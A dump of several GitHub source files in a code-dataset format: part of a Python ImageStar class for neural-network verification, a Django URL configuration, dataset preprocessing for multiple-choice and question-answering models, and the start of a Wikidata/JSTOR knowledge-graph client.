pool_size)\n \n height = pool_size[0]\n width = pool_size[1]\n size = height * width\n \n lb = np.zeros((size,1))\n ub = np.zeros((size,1))\n \n for i in range(size):\n current_point = points[i, :].astype(int)\n \n lb[i] = self.attributes[IM_LB_ID][current_point[0], current_point[1], channel_id]\n ub[i] = self.attributes[IM_UB_ID][current_point[0], current_point[1], channel_id]\n \n \n [max_lb_id, max_lb_val] = max(enumerate(lb), key=operator.itemgetter(1))\n \n max_id = np.argwhere((ub - max_lb_val) > 0)[:,0]\n \n return np.append(max_id, channel_id * np.zeros((len(max_id.shape)))).tolist()\n\n def add_max_id(self, name, max_id):\n \"\"\"\n Adds a matrix used for unmaxpooling reachability\n \n name : string -> name of the max pooling layer\n max_id : np.array([*int]) -> max indices\n \"\"\"\n \n #TODO: WHAT IS 'A' in NNV?\n return Exception(\"unimplemented\")\n \n def update_max_id(self, name, max_id, pos):\n \"\"\"\n Updates a matrix used for unmaxpooling reachability\n \n name : string -> name of the max pooling layer\n max_id : np.array([*int]) -> max indices\n pos : np.array([]) -> the position of the local pixel of the max map\n corresponding to the max_id\n \"\"\"\n \n ids_num = len(self.attributes[MAX_IDS])\n \n unk_layer_num = 0\n \n for i in range(ids_num):\n if self.attributes[MAX_IDS][i].get_name() == name:\n self.attributes[MAX_IDS][i].get_max_ids()[pos[0], pos[1], pos[2]] = max_id\n break\n else:\n unk_layer_num += 1\n \n if unk_laye_num == ids_num:\n raise Exception('error: %s' % ERRMSG_UNK_NAME_MAX_POOL_LAYER)\n\n def add_input_size(self, name, input_size):\n \"\"\"\n Adds a matrix used for unmaxpooling reachability\n \n name : string -> name of the max pooling layer\n input_size : np.array([*int]) -> input size of the original image\n \"\"\"\n \n #TODO: WHAT IS 'A' in NNV? \n return Exception(\"unimplemented\")\n \n def is_p1_larger_p2(self, *args):\n \"\"\"\n Compares two specific points in the image. Checks if p1 > p2 is feasible.\n Can be used in max pooling operation\n \n p1 : np.array([*int]) - the first points = [h1, w1, c1]\n p2 : np.array([*int]) - the second points = [h2, w2, c2], where\n h - height, w - width, c - channel id\n \n return : bool -> 1 if p1 > p2 is feasible,\n 0 if p1 > p2 is not feasible\n \n \"\"\"\n \n C1 = np.zeros(self.attributes[NUMPRED_ID])\n \n for i in range(1, self.attributes[NUMPRED_ID] + 1):\n C1[i-1] = self.attributes[V_ID][args[P2_ID][0], args[P2_ID][1], args[P2_ID][2], i] - \\\n self.attributes[V_ID][args[P1_ID][0], args[P1_ID][1], args[P1_ID][2], i]\n \n # TODO: WHY DOESN'T THE SUBTRAHEND HAVE THE 4-TH COMPONENT INDEXING IN NNV?\n d1 = self.attributes[V_ID][args[P1_ID][0], args[P1_ID][1], args[P1_ID][2], 0] - \\\n self.attributes[V_ID][args[P2_ID][0], args[P2_ID][1], args[P2_ID][2], 0]\n \n new_C = np.vstack((self.attributes[C_ID], C1))\n new_d = np.vstack((self.attributes[D_ID], d1))\n \n S = Star(self.attributes[V_ID], new_C, new_d, self.attributes[PREDLB_ID], self.attributes[PREDUB_ID])\n\n if S.isEmptySet():\n return 0\n else:\n return 1\n \n def is_max(self, *args):\n \"\"\"\n Checks if a pixel value is the maximum value compared with the other ones.\n Implements one of the core steps of the maxpooling operation over\n the ImageStar\n \n max_map -> the current max_map of the ImageStar\n ori_image -> the original ImageStar to compute the max_map\n center -> the center pixel position that is checked\n center = [x1, y1, c1]\n others -> the positions of the pixels we want to compare the center against\n others = [x2, y2, c3; x3, y3, c3]\n out_image : ImageStar -> the updated input image\n \n return -> a new predicate\n \"\"\"\n \n size = args[OTHERS_ID].shape[0]\n \n new_C = np.zeros((size, args[MAX_MAP_ID].get_num_pred()))\n new_d = np.zeros((size, 1))\n \n for i in range(n):\n new_d[i] = args[ORI_IMAGE_ID].get_V()[args[CENTER_ID][0], args[CENTER_ID][1], args[CENTER_ID][2], 0] - \\\n args[ORI_IMAGE_ID].get_V()[args[OTHERS_ID][0], args[OTHERS_ID][1], args[OTHERS_ID][2], 0]\n \n for j in range(args[MAX_MAP_ID].get_num_pred()):\n new_C[i, j] = args[ORI_IMAGE_ID].get_V()[args[CENTER_ID][0], args[CENTER_ID][1], args[CENTER_ID][2], j + 1] - \\\n args[ORI_IMAGE_ID].get_V()[args[OTHERS_ID][0], args[OTHERS_ID][1], args[OTHERS_ID][2], j + 1]\n \n C1 = np.vstack(args[MAX_MAP_ID].get_C(), new_C)\n d1 = np.vstack(args[MAX_MAP_ID].get_D(), new_d)\n \n # TODO: remove redundant constraints here\n \n return C1, d1\n \n def reshape(self, input, new_shape):\n \"\"\"\n Reshapes the ImageStar\n \n input : ImageStar -> the input ImageStar\n new_shape : np.array([]) -> new shape\n \n return -> a reshaped ImageStar\n \"\"\"\n \n size = np.size(new_shape)\n \n assert size[1] == 3 and size[0] == 1, 'error: %s' % ERRMSG_INVALID_NEW_SHAPE\n \n assert np.multiply(new_shape[:]) == input.get_height() * input.get_width() * input.get_num_channel(), \\\n 'error: %s' % ERRMSG_SHAPES_INCONSISTENCY\n \n new_V = np.reshape(input.get_V(), (new_shape, input.get_num_pred() + 1))\n \n return ImageStar(new_V, input.get_C(), input.get_d(), \\\n input.get_pred_lb(), input.get_pred_ub,\n input.get_im_lb, input.get_im_ub)\n \n def add_constraints(self, input, p1, p2):\n \"\"\"\n Adds a new constraint to predicate variables of an ImageStar\n used for finding counter examples. Add a new constraint: p2 >= p1\n \n input : ImageStar -> an input ImageStar\n p1 : np.array([]) -> first point position\n p2 : np.array([]) -> second point position\n new_C : np.array([]) -> a new predicate constraint matrix C\n new_d : new predicate constraint vector\n \n return -> [new_C, new_d] - a new predicate\n \"\"\"\n \n assert input is ImageStar, 'error: %s' % ERRMSG_INPUT_NOT_IMAGESTAR\n \n new_d = input.get_V()[p2[0], p2[1], p2[2], 1] - input.get_V()[p2[0], p2[1], p2[2], 1]\n new_C = input.get_V()[p2[0], p2[1], p2[2], 1:input.get_num_pred() + 1]\n \n new_C = np.reshape(new_c, (1, input.get_num_pred()))\n \n new_C = np.vstack(input.get_C(), new_C)\n new_C = np.vstack(input.get_d(), new_d)\n \n return new_C, new_d\n \n##################### GET/SET METHODS #####################\n \n def get_V(self):\n \"\"\"\n return -> the center and the basis matrix of the ImageStar\n \"\"\"\n \n return self.attributes[V_ID]\n \n########################## UTILS ##########################\n\n def validate_params(self, params):\n for param in params:\n assert isinstance(param, np.ndarray), 'error: ImageStar does not support parameters of dtype = %s' % param.dtype\n\n def isempty_init(self, *params):\n flag = True\n \n for param in params:\n flag = self.isempty(np.array(param))\n \n if flag == False:\n break\n \n return flag\n \n def isempty(self, param):\n return param.size == 0 or (param is np.array and param.shape[0] == 0)\n \n def init_empty_imagestar(self):\n for i in range(len(self.attributes)):\n if self.is_scalar_attribute(i):\n self.attributes[i] = 0\n else:\n self.attributes[i] = np.array([])\n\n def copy_deep(self, imagestar):\n for i in range(len(self.attributes)):\n self.attributes[i] = imagestar.get_attribute(i)\n\n def validate_point_dim(self, point, height, width):\n return (point[0] > -1) and (point[0] <= self.attributes[HEIGHT_ID]) and \\\n (point[1] > -1) and (point[1] <= self.attributes[WIDTH_ID]) and \\\n (point[2] > -1) and (point[2] <= self.attributes[NUM_CHANNEL_ID])\n\n def offset_args(self, args, offset):\n result = []\n \n for i in range(len(args) + offset):\n result.append(np.array([]))\n \n if i >= offset:\n result[i] = args[i - offset]\n \n return result\n \n def is_scalar(self, param):\n return isinstance(param, np.ndarray)\n \n def is_scalar_attribute(self, attribute_id):\n return attribute_id in self.scalar_attributes_ids\n","repo_name":"V2A2/StarV_temp","sub_path":"engine/set/imagestar/imagestar.py","file_name":"imagestar.py","file_ext":"py","file_size_in_byte":50946,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5523709196","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'layout'\nurlpatterns = [\n path('submit/', views.layout_submit, name='submit'),\n path('submit/validate/', views.validate_layout_submit, name='validate_submit'),\n path('confirm//', views.confirmed_layout, name='confirm'),\n path('review//', views.review_layout, name='review'),\n path('review//validate/', views.validate_review_layout, name='validate_review'),\n]\n","repo_name":"HiSPARC/publicdb","sub_path":"publicdb/station_layout/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"34557166978","text":"from dataclasses import dataclass\nfrom typing import Dict, Optional, Union\nfrom itertools import chain\nfrom pathlib import Path\nimport json\nfrom collections import defaultdict\nfrom abc import ABC, abstractmethod\n\nimport torch\nimport pandas as pd\nimport numpy as np \n\nfrom datasets import load_dataset\nfrom transformers import BertTokenizerFast\n\nfrom utils import mask_tokens\n\n@dataclass\nclass DataCollatorForMultipleChoice:\n is_train: bool\n tokenizer: BertTokenizerFast\n\n def __call__(self, features):\n batch = defaultdict(list)\n for feature in features:\n for k, v in feature.items():\n batch[k].append(v)\n batch = dict(map(lambda x: (x[0], torch.tensor(x[1]))if x[0] != 'ids' else (x[0], x[1]), dict(batch).items()))\n\n special_tokens_mask = batch.pop('special_tokens_mask')\n if self.is_train:\n batch['input_ids'] = mask_tokens(batch['input_ids'],\n paragraph_indices=(batch['token_type_ids'] &\n ~special_tokens_mask).bool(),\n mask_id=self.tokenizer.mask_token_id, mask_prob=0.15)\n return batch\n\nclass DataCollatorForQA:\n def __call__(self, features):\n batch = defaultdict(list)\n for feature in features:\n for k, v in feature.items():\n batch[k].append(v)\n batch = dict(map(lambda x: (x[0], torch.tensor(x[1]))if x[0] not in ['example_id', 'offset_mapping'] else (x[0], x[1]), dict(batch).items()))\n return batch\n\nclass BaseDataset(ABC):\n def __init__(self,\n context_path: str,\n paddings: bool,\n max_length: int,\n tokenizer: BertTokenizerFast,\n is_train = True,\n **kwargs\n ) -> None:\n self.paddings = \"max_length\" if paddings else False\n self.max_length = max_length\n self.tokenizer = tokenizer\n self.is_train = is_train\n if self.is_train:\n self.convert_HFdata(context_path, kwargs['train_path'], kwargs['trainHF_path'])\n self.convert_HFdata(context_path, kwargs['validation_path'], kwargs['validationHF_path'])\n self.train_dataset, self.eval_dataset = self.preprocess(dict(train=kwargs['trainHF_path'], \n validation=kwargs['validationHF_path']))\n else:\n self.convert_HFdata(context_path, kwargs['test_path'], kwargs['testHF_path'])\n self.test_dataset = self.preprocess(dict(test=kwargs['testHF_path']))\n\n @abstractmethod\n def convert_HFdata(self):\n pass\n \n @abstractmethod\n def preprocess(self):\n pass\n\nclass MultipleChoiceDataset(BaseDataset):\n def __init__(self,\n context_path: str,\n paddings: bool,\n max_length: int,\n tokenizer: BertTokenizerFast,\n is_train: bool,\n **kwargs\n ) -> None:\n super(MultipleChoiceDataset, self).__init__(context_path, \n paddings, max_length, tokenizer, is_train, **kwargs)\n\n def prepare_feature(self, examples):\n ending_names = [\"paragraphs_0\", \"paragraphs_1\", \"paragraphs_2\", \"paragraphs_3\"]\n context_name = \"question\"\n label_column_name = \"label\"\n\n first_sentences = [[context] * 4 for context in examples[context_name]]\n second_sentences = [[f\"{examples[end][i]}\" for end in ending_names] for i in range(len(examples[context_name]))]\n\n # Flatten out\n first_sentences = list(chain(*first_sentences))\n second_sentences = list(chain(*second_sentences))\n\n # Tokenize\n tokenized_examples = self.tokenizer(\n first_sentences,\n second_sentences,\n max_length=self.max_length,\n padding=self.paddings,\n truncation='only_second',\n return_special_tokens_mask=True\n )\n # Un-flatten\n tokenized_inputs = {k: [v[i : i + 4] for i in range(0, len(v), 4)] for k, v in tokenized_examples.items()}\n\n if self.is_train:\n labels = examples[label_column_name]\n tokenized_inputs[\"labels\"] = labels\n else:\n tokenized_inputs[\"ids\"] = examples[\"id\"]\n return tokenized_inputs\n\n def convert_HFdata(self, context_path: str, ori_json: str, HF_json: str) -> None:\n \"\"\"\n convert to HuggingFace SWAG dataset format\n \"\"\"\n with open(context_path, 'r', encoding='utf-8') as file:\n context = json.load(file)\n\n df = pd.read_json(ori_json, orient='records')\n\n if 'relevant' in df.columns:\n df[['paragraphs_0', 'paragraphs_1', 'paragraphs_2', 'paragraphs_3', 'label']] = df.apply(\n lambda df, contexts: (contexts[df['paragraphs'][0]], contexts[df['paragraphs'][1]], \n contexts[df['paragraphs'][2]], contexts[df['paragraphs'][3]], df['paragraphs'].index(df['relevant'])), args=(context,),\n axis=1, result_type='expand')\n df[['id', 'question', 'paragraphs_0', 'paragraphs_1', 'paragraphs_2', 'paragraphs_3', 'label']].to_json(HF_json, \n orient='records', indent=4, force_ascii=False)\n else:\n df[['paragraphs_0', 'paragraphs_1', 'paragraphs_2', 'paragraphs_3']] = df.apply(\n lambda df, contexts: (contexts[df['paragraphs'][0]], contexts[df['paragraphs'][1]], \n contexts[df['paragraphs'][2]], contexts[df['paragraphs'][3]]), args=(context,),\n axis=1, result_type='expand')\n df[['id', 'question', 'paragraphs_0', 'paragraphs_1', 'paragraphs_2', 'paragraphs_3']].to_json(HF_json,\n orient='records', indent=4, force_ascii=False)\n \n\n def preprocess(self, data_files: Dict):\n raw_datasets = load_dataset('json', data_files=data_files)\n if self.is_train:\n raw_datasets = raw_datasets.class_encode_column('label')\n\n processed_datasets = raw_datasets.map(\n self.prepare_feature, batched=True, remove_columns=raw_datasets[\"train\"].column_names\n )\n\n train_dataset = processed_datasets[\"train\"]\n eval_dataset = processed_datasets[\"validation\"]\n return train_dataset, eval_dataset\n else:\n processed_datasets = raw_datasets.map(\n self.prepare_feature, batched=True, remove_columns=raw_datasets[\"test\"].column_names\n )\n\n test_dataset = processed_datasets[\"test\"]\n return test_dataset\n\nclass QADataset(BaseDataset):\n def __init__(self,\n context_path: str,\n paddings: bool,\n max_length: int,\n tokenizer: BertTokenizerFast,\n is_train: bool,\n doc_stride: int,\n **kwargs\n ) -> None:\n self.doc_stride = doc_stride\n super(QADataset, self).__init__(context_path, \n paddings, max_length, tokenizer, is_train, **kwargs)\n\n def prepare_train_features(self, examples):\n question_column_name = \"question\" \n context_column_name = \"context\" \n answer_column_name = \"answers\"\n\n pad_on_right = self.tokenizer.padding_side == \"right\" \n\n # Some of the questions have lots of whitespace on the left, which is not useful and will make the\n # truncation of the context fail (the tokenized question will take a lots of space). So we remove that\n # left whitespace\n examples[question_column_name] = [q.lstrip() for q in examples[question_column_name]]\n\n # Tokenize our examples with truncation and maybe padding, but keep the overflows using a stride. This results\n # in one example possible giving several features when a context is long, each of those features having a\n # context that overlaps a bit the context of the previous feature.\n tokenized_examples = self.tokenizer(\n examples[question_column_name if pad_on_right else context_column_name],\n examples[context_column_name if pad_on_right else question_column_name],\n truncation=\"only_second\" if pad_on_right else \"only_first\",\n max_length=self.max_length,\n stride=self.doc_stride,\n return_overflowing_tokens=True,\n return_offsets_mapping=True,\n padding=self.paddings\n )\n\n # Since one example might give us several features if it has a long context, we need a map from a feature to\n # its corresponding example. This key gives us just that.\n sample_mapping = tokenized_examples.pop(\"overflow_to_sample_mapping\")\n # The offset mappings will give us a map from token to character position in the original context. This will\n # help us compute the start_positions and end_positions.\n offset_mapping = tokenized_examples.pop(\"offset_mapping\")\n\n # Let's label those examples!\n tokenized_examples[\"start_positions\"] = []\n tokenized_examples[\"end_positions\"] = []\n tokenized_examples['cls_index'] = []\n tokenized_examples['overflow_to_sample_mapping'] = []\n\n for i, offsets in enumerate(offset_mapping):\n # We will label impossible answers with the index of the CLS token.\n input_ids = tokenized_examples[\"input_ids\"][i]\n cls_index = input_ids.index(self.tokenizer.cls_token_id)\n tokenized_examples['cls_index'].append(cls_index)\n\n # Grab the sequence corresponding to that example (to know what is the context and what is the question).\n sequence_ids = tokenized_examples.sequence_ids(i)\n\n # One example can give several spans, this is the index of the example containing this span of text.\n sample_index = sample_mapping[i]\n tokenized_examples['overflow_to_sample_mapping'].append(sample_index)\n answers = examples[answer_column_name][sample_index]\n # If no answers are given, set the cls_index as answer.\n if len(answers[\"start\"]) == 0:\n tokenized_examples[\"start_positions\"].append(cls_index)\n tokenized_examples[\"end_positions\"].append(cls_index)\n else:\n # Start/end character index of the answer in the text.\n start_char = answers[\"start\"][0]\n end_char = start_char + len(answers[\"text\"][0])\n\n # Start token index of the current span in the text.\n token_start_index = 0\n while sequence_ids[token_start_index] != (1 if pad_on_right else 0):\n token_start_index += 1\n\n # End token index of the current span in the text.\n token_end_index = len(input_ids) - 1\n while sequence_ids[token_end_index] != (1 if pad_on_right else 0):\n token_end_index -= 1\n\n # Detect if the answer is out of the span (in which case this feature is labeled with the CLS index).\n if not (offsets[token_start_index][0] <= start_char and offsets[token_end_index][1] >= end_char):\n tokenized_examples[\"start_positions\"].append(cls_index)\n tokenized_examples[\"end_positions\"].append(cls_index)\n else:\n # Otherwise move the token_start_index and token_end_index to the two ends of the answer.\n # Note: we could go after the last offset if the answer is the last word (edge case).\n while token_start_index < len(offsets) and offsets[token_start_index][0] <= start_char:\n token_start_index += 1\n tokenized_examples[\"start_positions\"].append(token_start_index - 1)\n while offsets[token_end_index][1] >= end_char:\n token_end_index -= 1\n tokenized_examples[\"end_positions\"].append(token_end_index + 1)\n\n return tokenized_examples\n\n # Validation preprocessing\n def prepare_validation_features(self, examples):\n question_column_name = \"question\" \n context_column_name = \"context\" \n\n pad_on_right = self.tokenizer.padding_side == \"right\" \n # Some of the questions have lots of whitespace on the left, which is not useful and will make the\n # truncation of the context fail (the tokenized question will take a lots of space). So we remove that\n # left whitespace\n examples[question_column_name] = [q.lstrip() for q in examples[question_column_name]]\n\n # Tokenize our examples with truncation and maybe padding, but keep the overflows using a stride. This results\n # in one example possible giving several features when a context is long, each of those features having a\n # context that overlaps a bit the context of the previous feature.\n tokenized_examples = self.tokenizer(\n examples[question_column_name if pad_on_right else context_column_name],\n examples[context_column_name if pad_on_right else question_column_name],\n truncation=\"only_second\" if pad_on_right else \"only_first\",\n max_length=self.max_length,\n stride=self.doc_stride,\n return_overflowing_tokens=True,\n return_offsets_mapping=True,\n padding=self.paddings,\n )\n\n # Since one example might give us several features if it has a long context, we need a map from a feature to\n # its corresponding example. This key gives us just that.\n sample_mapping = tokenized_examples.pop(\"overflow_to_sample_mapping\")\n\n # For evaluation, we will need to convert our predictions to substrings of the context, so we keep the\n # corresponding example_id and we will store the offset mappings.\n tokenized_examples[\"example_id\"] = []\n tokenized_examples['overflow_to_sample_mapping'] = []\n\n for i in range(len(tokenized_examples[\"input_ids\"])):\n # Grab the sequence corresponding to that example (to know what is the context and what is the question).\n sequence_ids = tokenized_examples.sequence_ids(i)\n context_index = 1 if pad_on_right else 0\n\n # One example can give several spans, this is the index of the example containing this span of text.\n sample_index = sample_mapping[i]\n tokenized_examples['overflow_to_sample_mapping'].append(sample_index)\n tokenized_examples[\"example_id\"].append(examples[\"id\"][sample_index])\n\n # Set to None the offset_mapping that are not part of the context so it's easy to determine if a token\n # position is part of the context or not.\n tokenized_examples[\"offset_mapping\"][i] = [\n (o if sequence_ids[k] == context_index else None)\n for k, o in enumerate(tokenized_examples[\"offset_mapping\"][i])\n ]\n\n return tokenized_examples\n\n def convert_HFdata(self, context_path: str, ori_json: str, HF_json: str) -> None:\n \"\"\"\n convert to HuggingFace SQUAD dataset format\n \"\"\"\n with open(context_path, 'r', encoding='utf-8') as file:\n context = json.load(file)\n\n with open('relevant.json', 'r', encoding='utf-8') as file:\n relevant = json.load(file)\n\n df = pd.read_json(ori_json, orient='records')\n\n if 'answer' in df.columns:\n df[['context', 'answers']] = df.apply(\n lambda df, context: (context[df['relevant']], {k: [v] for k, v in df['answer'].items()}), args=(context,),\n axis=1, result_type='expand')\n df[['id', 'question', 'context', 'answers']].to_json(HF_json, \n orient='records', indent=4, force_ascii=False)\n else:\n df['relevant'] = df['id'].map(relevant)\n df['context'] = df['relevant'].apply(\n lambda s, context: context[int(s)] , args=(context,))\n df[['id', 'question', 'context']].to_json(HF_json, \n orient='records', indent=4, force_ascii=False)\n\n # print(df.head())\n\n def preprocess(self, data_files: Dict):\n raw_datasets = load_dataset('json', data_files=data_files)\n if self.is_train:\n train_dataset = raw_datasets[\"train\"]\n train_dataset = train_dataset.map(\n self.prepare_train_features, batched=True, remove_columns=raw_datasets[\"train\"].column_names,\n desc=\"Running tokenizer on train dataset\"\n )\n\n eval_example = raw_datasets[\"validation\"]\n train_feature = eval_example.map(\n self.prepare_train_features, batched=True, remove_columns=raw_datasets[\"validation\"].column_names,\n desc=\"Running tokenizer on validation dataset\"\n )\n valid_feature = eval_example.map(\n self.prepare_validation_features, batched=True, remove_columns=raw_datasets[\"validation\"].column_names,\n desc=\"Running tokenizer on validation dataset\"\n )\n for column in valid_feature.column_names:\n if column not in train_feature.column_names:\n assert len(valid_feature[column]) == torch.tensor(train_feature[\"input_ids\"]).shape[0]\n train_feature = train_feature.add_column(column, valid_feature[column])\n else:\n assert torch.tensor(train_feature[column]).shape == torch.tensor(valid_feature[column]).shape\n eval_dataset = train_feature\n return train_dataset, dict(preprocessed=eval_dataset, non_preprocessed=eval_example)\n else:\n test_example = raw_datasets['test']\n test_dataset =test_example.map(\n self.prepare_validation_features, batched=True, remove_columns=raw_datasets[\"test\"].column_names,\n desc=\"Running tokenizer on prediction dataset\"\n )\n\n return dict(preprocessed=test_dataset, non_preprocessed=test_example)\n","repo_name":"RobertChienShiba/2022-Fall-ADL","sub_path":"HW2/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":17888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29705445426","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nlogging.basicConfig(format='%(asctime)s : %(filename)s : %(levelname)s : %(message)s')\nlogger = logging.getLogger()\n\nimport os\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\nimport json\nimport getopt\nimport sys\nimport traceback\nfrom urllib.parse import quote\nfrom collections import OrderedDict\n\nimport requests\nlogging.getLogger('requests').setLevel(logging.INFO)\n\nimport markdown as markdown_parser\nfrom bs4 import BeautifulSoup\n\nfrom fingerprints import get_fingerprints\n\nGRAPHS = [\n {\n 'ns': 'jstor',\n 'prefix': 'http://kg.jstor.org/entity/',\n 'baseurl': 'https://kg.jstor.org/entity',\n 'sparql_endpoint': 'https://kg-query.jstor.org/proxy/wdqs/bigdata/namespace/wdq/sparql',\n 'api_endpoint': 'https://kg.jstor.org/w/api.php',\n 'types': {\n 'entity': 'Q13'\n }\n },\n {\n 'ns': 'wd',\n 'prefix': 'http://www.wikidata.org/entity/',\n 'baseurl': 'https://www.wikidata.org/entity',\n 'sparql_endpoint': 'https://query.wikidata.org/sparql',\n 'api_endpoint': 'https://www.wikidata.org/w/api.php',\n 'types': {\n 'entity': 'Q35120'\n }\n }\n]\nPREFIXES = dict([(g['ns'],g['prefix']) for g in GRAPHS])\nNAMESPACES = set([g['ns'] for g in GRAPHS])\ndefault_ns = 'wd'\ndefault_entity_type = 'entity'\n\ndef as_uri(s, acct=None, repo=None, **kwargs):\n global default_ns\n uri = None\n if s.startswith('http'):\n uri = s\n else:\n prefix, entity_id = s.split(':') if ':' in s else (default_ns, s)\n logger.info(f'as_uri: prefix={prefix} entity_id={entity_id} {_is_entity_id(entity_id, False)}')\n if prefix in PREFIXES and _is_entity_id(entity_id, False):\n logger.info(f'{prefix}:{entity_id}')\n uri = f'{PREFIXES[prefix]}{entity_id}'\n else:\n uri = f'http://{acct}.github.io/{repo}/entity/{s}'\n logger.info(uri)\n return uri\n\nclass KnowledgeGraph(object):\n\n def __init__(self, **kwargs):\n self.acct = kwargs.get('acct')\n self.repo = kwargs.get('repo')\n self.cache = kwargs.get('cache', {})\n self.entity_type = kwargs.get('entity_type', default_entity_type)\n self.prop_mappings = {}\n self.formatter_urls = {}\n for g in GRAPHS:\n self.prop_mappings[g['ns']] = dict([(p['id'], p) for p in self._properties(g)])\n self.formatter_urls[g['ns']] = dict([(p['id'], p) for p in self._formatter_urls(g)])\n logger.info(f'KnowledgeGraph: acct={self.acct} repo={self.repo}')\n\n def entity(self, uri, project=None, raw=False, article=None, **kwargs):\n logger.info(f'entity={uri} project={project} raw={raw} article={article}')\n refresh = str(kwargs.pop('refresh', 'false')).lower() in ('', 'true')\n\n cache_key = f'{uri}-{project}'\n entity = self.cache.get(cache_key) if not refresh and not raw else None\n if entity:\n entity['fromCache'] = True\n return entity\n \n secondary = None\n if uri.startswith('http://kg.jstor.org/'):\n primary = self._entity_from_wikibase(uri)\n primary['id'] = f'jstor:{primary[\"id\"]}'\n if primary and 'Wikidata entity ID' in primary.get('claims', {}):\n secondary = self._entity_from_wikibase(primary['claims'].pop('Wikidata entity ID')[0]['value']['url'])\n elif uri.startswith('http://www.wikidata.org/'):\n primary = self._entity_from_wikibase(uri)\n primary['id'] = f'wd:{primary[\"id\"]}'\n else:\n uri = uri if uri.endswith('.json') else f'{uri}.json'\n primary = self._entity_from_url(uri)\n wd_id = None\n statements = []\n for stmt in primary.get('statements', []):\n if stmt['claim']['property'] == 'Wikidata entity ID':\n wd_id = stmt['claim']['value']\n else:\n statements.append(stmt)\n if wd_id:\n primary['statements'] = stmt\n secondary = self._entity_from_wikibase(f'http://www.wikidata.org/entity/{wd_id}')\n\n if secondary: # merge primary and secondary\n entity = {'id': primary['id']}\n for fld in ('labels', 'descriptions', 'aliases', 'claims'):\n entity[fld] = {**secondary.get(fld,{}), **primary.get(fld,{})}\n else:\n entity = primary\n\n if not raw:\n self._add_summary_text(entity, project, article, **kwargs)\n \n entity = self._add_id_labels(entity, get_fingerprints(self._find_ids(entity)))\n \n self.cache[cache_key] = entity\n\n entity['fromCache'] = False\n\n return entity\n\n def _entity_from_url(self, uri):\n for suffix in ('', '.json', 'jsonld'):\n try:\n entity = requests.get(f'{uri}{suffix}').json()\n if 'id' not in entity:\n entity['id'] = uri.replace('https', 'http').replace('.json', '').replace('.jsonld', '')\n return entity\n except:\n pass\n return {}\n\n def _entity_from_wikibase(self, uri, language='en', entity_type='entity'):\n '''Gets entity data directly from wikibase API (rather than a SPARQL query) and\n returns a simplified representation of data with property IDs converted to labels enabling\n property merging with other graphs using a compatible data model'''\n g = [g for g in GRAPHS if uri.startswith(g['prefix'])][0]\n qid = uri.split('/')[-1]\n ns = g['ns']\n entity_url = f'{g[\"api_endpoint\"]}?format=json&action=wbgetentities&ids={qid}'\n resp = requests.get(entity_url).json()\n raw_entity = resp.get('entities', {}).get(qid)\n entity = OrderedDict()\n for fld in ('id', 'labels', 'descriptions', 'aliases'):\n if fld in raw_entity:\n entity[fld] = raw_entity[fld]\n if 'claims' in raw_entity:\n entity['claims'] = self._claims(raw_entity['claims'], ns)\n return entity\n\n def _claims(self, claims, ns='wd'):\n '''Converts wikibase claims into a simplified version with property IDs (Pxxxx)\n converted to text using the property labels.'''\n _claims = {}\n for prop, stmts in claims.items():\n prop_label = self.prop_mappings[ns].get(prop, {}).get('label', prop)\n _claims[prop_label] = []\n for stmt in stmts:\n stmt_value = self._stmt_value(stmt['mainsnak'], ns)\n if not stmt_value:\n continue\n value = {'value': stmt_value}\n _claims[prop_label].append(value)\n if 'qualifiers' in stmt:\n value['qualifiers'] = {}\n for qual_prop, qualifiers in stmt['qualifiers'].items():\n qualifier_label = self.prop_mappings[ns][qual_prop]['label']\n value['qualifiers'][qualifier_label] = []\n for qualifier in qualifiers:\n value['qualifiers'][qualifier_label].append(self._stmt_value(qualifier, ns))\n if 'references' in stmt:\n value['references'] = []\n for reference in stmt['references']:\n value['references'].append({})\n for ref_prop, ref_stmts in reference['snaks'].items():\n ref_label = self.prop_mappings[ns][ref_prop]['label']\n value['references'][-1][ref_label] = []\n for ref_stmt in ref_stmts:\n value['references'][-1][ref_label].append(self._stmt_value(ref_stmt, ns))\n return _claims\n \n def _stmt_value(self, stmt, ns='wd'):\n '''Performs any needed statement value conversions'''\n if 'datavalue' in stmt:\n datatype = stmt['datatype']\n value = stmt['datavalue']['value']\n if datatype in ('commonsMedia', 'string', 'url'):\n return value\n elif datatype == 'external-id':\n extid = {'id': value}\n if 'property' in stmt and stmt['property'] in self.formatter_urls[ns]:\n extid['url'] = self.formatter_urls[ns][stmt[\"property\"]][\"url\"].replace('$1', value)\n return extid\n elif datatype == 'wikibase-item':\n return f'{ns}:{value[\"id\"]}'\n elif datatype == 'globe-coordinate':\n return [value['latitude'], value['longitude']]\n elif datatype == 'quantity':\n # https://www.mediawiki.org/wiki/Wikibase/DataModel/JSON#quantity\n value['unit'] = value['unit'].replace('http://www.wikidata.org/entity/', 'wd:')\n return value\n elif datatype == 'time':\n # More info on time precision can be found at https://www.mediawiki.org/wiki/Wikibase/DataModel/JSON#time\n return {'time': value['time'][1:], 'precision': value['precision']}\n elif datatype == 'monolingualtext':\n return value # TODO\n else:\n logger.warning(f'Unrecognized datatype {datatype} with value {value}')\n return value\n\n def _properties(self, g):\n '''Get property mappings for graph to map property entity IDs to labels'''\n cached_props_path = f'mappings/{g[\"ns\"]}-props.json'\n if os.path.exists(cached_props_path):\n with open (cached_props_path, 'r') as fp:\n props = json.load(fp)\n return props\n else:\n sparql = '''\n SELECT ?property ?propertyType ?propertyLabel ?propertyDescription ?propertyAltLabel WHERE {\n ?property wikibase:propertyType ?propertyType .\n SERVICE wikibase:label { bd:serviceParam wikibase:language \"[AUTO_LANGUAGE],en\". }\n }\n ORDER BY ASC(xsd:integer(STRAFTER(STR(?property), 'P')))'''\n sparql_results = requests.post(\n g['sparql_endpoint'],\n headers={\n 'Accept': 'application/sparql-results+json',\n 'Content-type': 'application/x-www-form-urlencoded',\n 'User-agent': 'JSTOR Labs python client'},\n data='query=%s' % quote(sparql)\n ).json()['results']['bindings']\n props = [\n {\n 'id': p['property']['value'].split('/')[-1],\n 'type': p['propertyType']['value'].split('#')[-1],\n 'label': 